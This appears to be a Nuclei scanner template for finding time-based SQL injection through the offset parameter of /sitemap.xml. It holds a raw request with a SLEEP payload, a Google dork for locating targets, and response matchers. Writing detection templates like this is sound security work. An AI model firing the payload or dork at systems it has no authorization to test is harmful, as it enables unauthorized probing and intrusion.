id: sitemap-sql-injection

info:
  name: Sitemap - SQL Injection
  author: Aravind
  severity: high
  reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
  metadata:
    google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap
    max-request: 1
  tags: misconfig,sitemap,sqli

http:
  - raw:
      - |
        @timeout: 15s
        POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(header, "application/xml") && contains(body, "sitemap>")'
        condition: and